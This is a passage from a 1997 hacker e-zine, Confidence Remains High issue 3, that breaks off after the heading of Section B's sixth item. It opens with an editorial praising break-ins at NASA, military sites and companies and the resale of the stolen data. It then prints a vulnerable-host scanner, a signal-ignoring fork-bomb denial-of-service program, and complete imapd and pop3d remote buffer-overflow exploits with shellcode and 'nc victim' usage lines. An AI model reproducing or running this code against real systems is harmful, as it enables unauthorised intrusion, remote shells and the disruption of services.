Copy Link
Add to Bookmark
Report

Confidence Remains High Issue 03

eZine's profile picture
Published in 
Confidence Remains High
 · 21 Aug 2019

  

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.oO The CodeZero Oo.
.oO Presents Oo.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Welcome to issue 3, the special summer edition of...

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/IIIIIIIIII /IIIIIIIIII /III /III
\ III_____/ \ III___/III \ III \ III
\ III \ III \ III \ III \_III
\ III onfidence \ IIIIIIII emains \ IIIIIIIIII igh
\ III \ III__/III \ III__/ III
\ III \ III \ III \ III \ III
\ IIIIIIIIII ___ \ III \ III ___ \ III \ III ___
\_________/ /\__\ \__/ \__/ /\__\ \__/ \__/ /\__\
\/__/ \/__/ \/__/


[15/o7/97]
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

CRH Editor : Tetsu Khan
Official CRH Kung-Fu Film : Turf On A Rope
Official CRH Pimp : so1o
Official CRH Spic With A Red Hat : xFli
Official CRH T-Shirt Supplier : NightRage
Official CRH Visual Basic Coder : \\StOrM\\ aka Jason Sloderbeck
Official CRH Print Brother : Digital Darkness

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

.-----------[ An Official ]-----------.
: .-----. .----. .--.--. :
: : .--' : .-. : : : : :
!_-:: : : : `-' ; : . : ::-_!
:~-:: :: : :: . : :: : ::-~:
: ::.`--. ::.: : ::.: : :
: `-----' `--'--' `--'--' :
!_-:: ::-_!
:~-::-[ Confidence Remains High ]-::-~:
:~-:: ::-~:
`-----------[ Production ]------------'

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In This "Added Linux Exploits" Issue :
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

-----=> Section A : Introduction And Cover Story.

1. Confidence Remains High issue 3 [summer edition]...: Tetsu Khan
2. The network is our playground......................: so1o

-----=> Section B : Exploits And Code.

1. RPC-Check.sh.......................................: yo
2. DoS : superforker.c................................: Vio
3. Cool Bot Juarez : personal.tcl.....................: Scorn

4. Linux imapd remote exploit.........................: Savage
5. Linux pop3 remote exploit..........................: Savage
6. Linux cxterm exploit...............................: Ming Zhang
7. Linux nlspath exploit..............................: Solar Designer

8. Solaris 2.5.1 ps exploit...........................: J. Zbiciak
9. 0wned.c............................................: so1o

-----=> Section C : Phones / Scanning / Radio.

1. DTMF Decoder.......................................: xFli
2. Dealing With Directory Assistance Operators........: Qytpo
3. Russian fone #'s (+7 095 XXXxxxx)..................: CyberLirik
4. How to fuck over a UK payphone.....................: so1o / NightRage
5. Radio link for TI-85 calculators...................: Michael Jan

-----=> Section D : Miscellaneous.

1. More sIn inf0z.....................................: The CodeZero + Friends
2. Rooting From Bin...................................: so1o
3. DNS Spoofing.......................................: so1o
4. FreeNet............................................: TrN
5. Backdoors Revised..................................: Blk-Majik
6. One Last Thing About The Infamous pHf Technique....: so1o
7. Test-cgi holes.....................................: so1o
8. Tree raping........................................: digitalboy [DD]
9. .htpasswd + .htaccess..............................: Cain [DD]

-----=> Section E : World News.

1. Some History.......................................: nobody
2. [GUNNAR] and MadSeason and sIn.....................: so1o
3. "Welcome to the [D]epartment of [O]wned [E]nergy"..: so1o
4. LOPHT.COM..........................................: so1o
5. AAA Report.........................................: so1o
6. Lamer of the fucking year : pSId (DALnet)..........: so1o

------=> Section F : Projects.

1. STiK...............................................: mstrhelix

-----=> Section G : The End. (+ Personal Column)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Confidence Remains High issue 3 [summer edition] : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Issue 4 will be out at the beginning of September, so to last you through
the long hot summer nights, we present the special summer issue of
Confidence Remains High, effectively issue 3 with more stuff in it.

blah blah blah....codez.com is going down so here's the list :

Confidence Remains High distro site list...
-------------------------------------------

http://insecurity.insecurity.org/codez/
http://www.r0ot.org
http://www.exceed.net
http://www.7thsphere.com/hpvac/hacking.html

ftp://ftp.sekurity.org/users/so1o/

...And alot of other sites, just go looking around.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. The network is our playground : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Just sit back for a few minutes and consider how much power we have as hackers,
from our Linux boxes, or Wind0ze systems, we can connect to many thousands of
Government or Military sites, as well as company networks where useful
information such as credit card details can easily be found, all we need is
the knowledge of holes in such systems, the means to exploit these holes, and
the skills needed to "root" the system, thats all it takes.

In 15 minutes, a hacker could 0wn many important NASA systems, and then proceed
to pull the following types of files from such a system...

- Personnel information.
- Mission reports and test results.
- Satellite programs and information.
- Future mission dates.

Or say it was a military system, then that hacker, if he knew what he was doing
would be able to gain access (with relative ease) to the following kinds of
files...

- Personnel information.
- Weapons reports.
- Tactical analysis.
- Future mission dates.
- Intelligence papers.


Lets say that a hacker was to attack a company, such as Intel, then he would
be able to access...

- Product test results.
- Internal mail between users.
- Future plans or products.
- Blueprints.

... then that hacker could sell off that companies research and development
reports to others, and make some ca$h.

It is clear to see, that from the power we have by just owning a computer and
a modem is quite huge in the right hands, and that it is pretty simple to go
out and find yourself some classified information if you really want to.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. RPC-Check.sh : yo
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

#!/bin/sh
#rpc.chk 1.0
#
# Make sure you have got a newer version of Bourne Shell (SVR2 or newer)
# that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS)
# or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to
# change the magic number, indicating the type of executable Bourne Shell.
#
# The script obtains via nslookup utility a list of hostnames from a nameserver
# and checks every entry of the list for active rexd procedures as well as
# ypserver procedures. The output is a list of the sites that run those
# daemons and are insecure.
# -yo.


domainname=$1
umask 022
PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH

#
# Function collects a list of sites
# from a nameserver. Make sure you've got the nslookup utility.
#
get_list() {
(
echo set type=ns
echo $domainname
) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$ 2>/dev/null
if [ ! -s .tmp$$ ]; then
echo "No such domain" >&2
echo "Nothing to scan" >&2
exit 1
fi
for serv in `cat .tmp$$`;do
(
echo server $serv
echo ls $domainname
) | nslookup > .file$$ 2>/dev/null
lines=`cat .file$$ | wc -l`
tail -`expr $lines - 7` .file$$ | cut -d" " -f2 > .file.tmp # .file
sed -e "s/$/.$domainname/" .file.tmp > .hosts$$
rm -rf .file* .tmp$$
sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$
done
tr 'A-Z' 'a-z' <HOSTS$$ |sort|uniq -q > HOSTS.$domainname;rm -rf HOSTS$$
}

# Function

rpc_calls()
{
for entry in `cat HOSTS.$domainname`; do
(
rpcinfo -t $entry ypserv >/dev/null && echo $entry runs YPSERV || exit 1 # Error!
) >> .log 2>/dev/null
(
rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD || exit 1 # Error !
) >> .log 2>/dev/null
done
}

# Main

if [ "$domainname" = '' ]; then
echo "Usage $0 domainname" >&2
exit 1
fi
get_list
echo "Checking $domainname domain" > .log
echo "*****************************" >> .log
echo "Totally `cat HOSTS.$domainname | wc -l` sites to scan" >> .log
echo "******************************" >> .log
echo "started at `date`" >> .log
echo "******************************" >> .log
rpc_calls
echo "******************************" >> .log
echo "finished at `date`" >> .log

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. DoS : superforker.c : Vio
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

This program is fucking evil, I have tested it on a few systems and it just
screws them over and sloooOOooows them right down, you cant throw anything at
the shell, its pretty sadistic...


/* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the
bugtraq

This program is a beefed up classic denial of service fork()'er :)

Compilation:

on BSD type of systems do: gcc -DBSD_C -o cvn cvn.c
on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c

on my linux, I can compile it with both -DBSD_C and -DSYSV_C

if your not sure, you can experiment, or compile it
without any -D'efines


In the future:

SunOS signals ignored.
Creation of random symlinks for more gory destruction.
Using advanced technology coding to make the hard drive
blow up with a loud boom and the console explode causing
a nuclear meltdown.

Direct All Suggestions And Flames to: Vio

NOTE: this program is provided for educational purposes only, its author
will not take any responsibility for any stupid things you will
decide to do.

this has been tested, but not the latest version of it.
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>

#define MAX_FILELEN 100 /* The _actual_ max length */
#define MAX_DIRLEN 10

#define START_DIR "/tmp" /* This can be substituted for any directory */
/* that you have write access to */

void dirs_generator(void);

main(int argc, char *argv[])
{
int fp;
char *buff;
char chr;

unlink(argv[0]);

/* You might wanna ignore all the signals you can ignore.. */
signal(SIGINT, SIG_IGN); /* If any of the signals don't work */
signal(SIGHUP, SIG_IGN); /* on the system you are compiling */
signal(SIGTERM, SIG_IGN); /* them on, just erase that line */
signal(SIGALRM, SIG_IGN);
signal(SIGBUS, SIG_IGN);
signal(SIGFPE, SIG_IGN);
signal(SIGILL, SIG_IGN);
signal(SIGIOT, SIG_IGN);
signal(SIGPIPE, SIG_IGN);
signal(SIGQUIT, SIG_IGN);
signal(SIGSEGV, SIG_IGN);
signal(SIGTRAP, SIG_IGN);
signal(SIGUSR1, SIG_IGN);
signal(SIGUSR2, SIG_IGN);

#ifdef BSD_C
signal(SIGPROF, SIG_IGN);
signal(SIGSTOP, SIG_IGN);
signal(SIGTSTP, SIG_IGN);
signal(SIGTTIN, SIG_IGN);
signal(SIGTTOU, SIG_IGN);
signal(SIGVTALRM, SIG_IGN);
signal(SIGXCPU, SIG_IGN);
signal(SIGXFSZ, SIG_IGN);
#endif

#ifdef SYSV_C
signal(SIGPOLL, SIG_IGN);
signal(SIGPWR, SIG_IGN);
#endif

if(fork()) {
printf("Now crashing and blowing up this system.. have a nice day\n");
printf("You can safely logout, and let the proggie do its work\n");
printf("or you can stick around and watch lag go from 0 to bitch\n");
printf("in a matter of seconds\n");
printf(" --CoViN \n");
exit(0);
}
fp=open("/tmp/.foo",O_WRONLY|O_CREAT);
if(fork()) {
while(1) {
fork();
buff = malloc(64000);
write(fp, buff, 64000);
system("uptime");
}
}
dirs_generator();
}


void dirs_generator(void)
{
char alph[] = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. ";
char fl[MAX_FILELEN];
char dir[MAX_DIRLEN];
int i;
int flen;

printf("Making dirs..\n");
chdir(START_DIR);

fork(); /* For the simplicity of the code.. we also want more dir's from */
fork(); /* the START_DIR */
fork();

while(1) {
fork();
flen= (rand() % MAX_FILELEN) - 1;
for(i=0; i<flen; i++)
fl[i] = alph[rand() % strlen(alph)];
fl[MAX_FILELEN-1]=0;
i=open(fl,O_WRONLY|O_CREAT);
write(i,"fuck you! CoViN",16);
close(i);

flen= (rand() % MAX_DIRLEN) - 1;
for(i=0; i<flen; i++)
dir[i] = alph[rand() % strlen(alph)];
dir[MAX_DIRLEN-1]=0;
mkdir(dir,0);
chdir(dir);
}
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Cool Bot Juarez : personal.tcl : Scorn
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

# A simple example of using public responses to give the bot
# a personality. Send comments to SCORN (scorn@destiny.net).
# pHEARSOMe in #linuxwarez on EFnet runs this exact TCL script

# flag to turn personality on and off
set persona_flag 1

# min delay time between responses to prevent flooding
set persona_wait 10

# binds to answer questions

bind pubm - "*one*know*if*\\?*" pub_answer
bind pubm - "*one*know*how*\\?*" pub_answer
bind pubm - "*pHEARS*\\?*" pub_answer
bind pubm - "*pHEARS*bot*" pub_answer

# binds to answer greetings

bind pubm - "*re all*" pub_greet
bind pubm - "*hello all*" pub_greet
bind pubm - "*hi all*" pub_greet
bind pubm - "*sup*every*" pub_greet
bind pubm - "*sup*all*" pub_greet


# binds to answer goodbyes

bind pubm - "*cya*all" pub_bye
bind pubm - "*bbl*" pub_bye
bind pubm - "*bbia*" pub_bye
bind pubm - "*later*every*" pub_bye
bind pubm - "*bye*every*" pub_bye
bind pubm - "*ttyl*every*" pub_bye
bind pubm - "*later*all*" pub_bye
bind pubm - "*ttyl*all*" pub_bye
bind pubm - "*bye*all*" pub_bye

# binds to answer STUPID questions

bind pubm - "*one*got*site*" pub_stupid

# misc. binds

bind pubm - "*where*tk3play*" pub_tk3
bind pubm - "*url*tk3play*" pub_tk3
bind pubm - "*tk3play*where*" pub_tk3
bind pubm - "*tk3play*url*" pub_tk3
bind pubm - "*what*mp3*player*" pub_tk3
bind pubm - "*where*mp3*player*" pub_tk3

# arrays of responses

set stupid(0) "go ask for that in #linux, they might help you out there"
set stupid(1) "try ftp.linuxwarez.com!! it's got everything!!"
set stupid(2) "I got that, but I ain't givin it to you"
set stupid(3) "I tried to get that in #exceed today, but when i asked for it, it said 'cannot send to channel' but i don't want to send, i want to get!!! what am I doing wrong?"
set stupid(4) "no, but I got nekkid pics of sh00p if ya want."
set stupid(5) "no, but I got crabs, ya want some?"
set stupid(6) "I got that, I got that!!"
set stupid(7) "Talk to Trinitron, he's probably got that"
set stupid(8) "don't trade warez!!! its illegal!! you're gonna git busted!!"
set stupid(9) "I used to have that, but the fEDZ got muh warez CD and won't give it back :("
set stupid(10) "why don't yew stop leeching and start offering, ya lamah"
set stupid(11) "don't bother, it really sux. I rm -rf'd that REAL quick."
set stupid(12) "I got that, here, lemme send it over. But i'm on a 2600 baud modem."
set stupid(13) "when you get that, can you upload it to whitehouse.gov ftp site for me please?"
set stupid(14) "Linus Torvalds is giving that away, email him bout it"
set stupid(15) "I got that, but i'm only trading that for nude pics of sh00p."
set stupid(16) "I got that, but i'm only trading that for Linux for win95"
set stupid(17) "can you offer that up when ya git it? :)"
set stupid_size 18

set answer(0) "hellz yea"
set answer(1) "fuck no!"
set answer(2) "it's possible..."
set answer(3) "who cares? I shure as hell don't"
set answer(4) "I dunno, go ask in #lamer"
set answer(5) "I could tell ya, but then i'd have to kill ya."
set answer(6) "maybe"
set answer(7) "hmmm...."
set answer(8) "uh....."
set answer(9) "err...."
set answer(10) "lemme think about that one for a sec"
set answer(11) "I ain't no Answer Wizard"
set answer(12) "RTFM"
set answer(13) "nope"
set answer(14) "um, no"
set answer(15) "ya, i think so"
set answer(16) "no way"
set answer_size 17

set greets(0) "sup"
set greets(1) "yo!"
set greets(2) "oh no not you again"
set greets(3) "hey whut's up"
set greets(4) "you came in the wrong room this ain't #dogsex,"
set greets(5) "go away"
set greets(6) "well look who's here, its"
set greets(7) "hey, i hear #netsex misses you,"
set greets(8) "we missed you"
set greets(9) "oh no, yew gotta be another #oldwarez lamer, aren't you,"
set greet_size 10

set bye(0) "lata"
set bye(1) "and don't come back"
set bye(2) "cyaz"
set bye(3) "goin to #sexpics again I see...yer a perv"
set bye(4) "bye"
set bye(5) "take it easy"
set bye(6) "see ya in hell"
set bye_size 7

# general functions to answer questions randomly, has a
# delay so other more specific binds will have priority

proc pub_answer {nick uhost hand channel args} {
global persona_flag answer_nick answer_channel
if {$persona_flag} {
set answer_nick $nick
set answer_channel $channel
utimer 1 _pub_answer
}
return 0
}

proc _pub_answer {} {
global answer answer_size persona_flag answer_nick answer_channel
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $answer_channel :$answer([rand $answer_size])"
putlog "<<$answer_nick>> Persona-Answer"
return 1
}
return 0
}

# function to answer greetings

proc pub_greet {nick uhost hand channel args} {
global greets greet_size persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$greets([rand $greet_size]) $nick"
putlog "<<$nick>> Persona-Greet"
return 1
}
return 0
}

# function to answer stupid stuff

proc pub_stupid {nick uhost hand channel args} {
global stupid stupid_size persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$nick , $stupid([rand $stupid_size])"
putlog "<<$nick>> Persona-Stupid"
return 1
}
return 0
}

# function to answer goodbyes

proc pub_bye {nick uhost hand channel args} {
global bye bye_size persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$bye([rand $bye_size]) $nick"
putlog "<<$nick>> Persona-Bye"
return 1
}
return 0
}

# misc. functions

proc pub_tk3 {nick uhost hand channel args} {
global persona_flag
if {$persona_flag} {
persona_pause
putserv "PRIVMSG $channel :$nick, check out tk3play at bleh"
putlog "<<$nick>> Persona-tk3play"
return 1
}
return 0
}


# function to enforce minimum pause between responses

proc persona_pause {} {
global persona_flag persona_wait
if {$persona_flag} {
persona_off
utimer $persona_wait persona_on
}
return 1
}

# functions to turn the personality on and off

proc persona_on {} {
global persona_flag
set persona_flag 1
return 1
}

proc persona_off {} {
global persona_flag
set persona_flag 0
return 1
}

putlog "Scorn's persona.tcl is loaded"

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. Linux imapd remote exploit : Savage
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/*
* IMAPd Linux/intel remote xploit by savage@apostols.org 1997-April-05
*
* Workz fine against RedHat and imapd distributed with pine
*
* Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!!
*
* usage:
* $ (imap 0; cat) | nc victim 143
* |
* +--> usually from -1000 to 1000 ( try in steps of 100 )
*/


#include <stdio.h>

char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh";

char username[1024+255];

void main(int argc, char *argv[]) {
int i,a;
long val;

if(argc>1)
a=atoi(argv[1]);
else
a=0;

strcpy(username,shell);

for(i=strlen(username);i<sizeof(username);i++)
username[i]=0x90; /* NOP */

val = 0xbffff501 + a;

for(i=1024;i<strlen(username)-4;i+=4)
{
username[i+0] = val & 0x000000ff;
username[i+1] = (val & 0x0000ff00) >> 8;
username[i+2] = (val & 0x00ff0000) >> 16;
username[i+3] = (val & 0xff000000) >> 24;
}

username[ sizeof(username)-1 ] = 0;

printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username);
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Linux pop3 remote exploit : Savage
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/*
* pop3d Linux/intel remote xploit by savage@apostols.org 1997-April-05
*
* workz fine against old pop3d distributed with pine.
*
* Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!!
*
* usage:
* $ (imap 0; cat) | nc victim 143 -- "doesnt pop3 run on 110?" - so1o
* |
* +--> usually from -100 to 100
*/


#include <stdio.h>

char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh";

char username[1024+255];

void main(int argc, char *argv[]) {
int i,a;
long val;

if(argc>1)
a=atoi(argv[1]);
else
a=0;

strcpy(username,shell);

for(i=strlen(username);i<sizeof(username);i++)
username[i]=0x90; /* NOP */

val = 0xbffff501 + a;

for(i=1024;i<strlen(username)-4;i+=4)
{
username[i+0] = val & 0x000000ff;
username[i+1] = (val & 0x0000ff00) >> 8;
username[i+2] = (val & 0x00ff0000) >> 16;
username[i+3] = (val & 0xff000000) >> 24;
}

username[ sizeof(username)-1 ] = 0;

printf("USER %s\nPASS Yoshemite\n", username);
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. Linux cxterm exploit : Ming Zhang
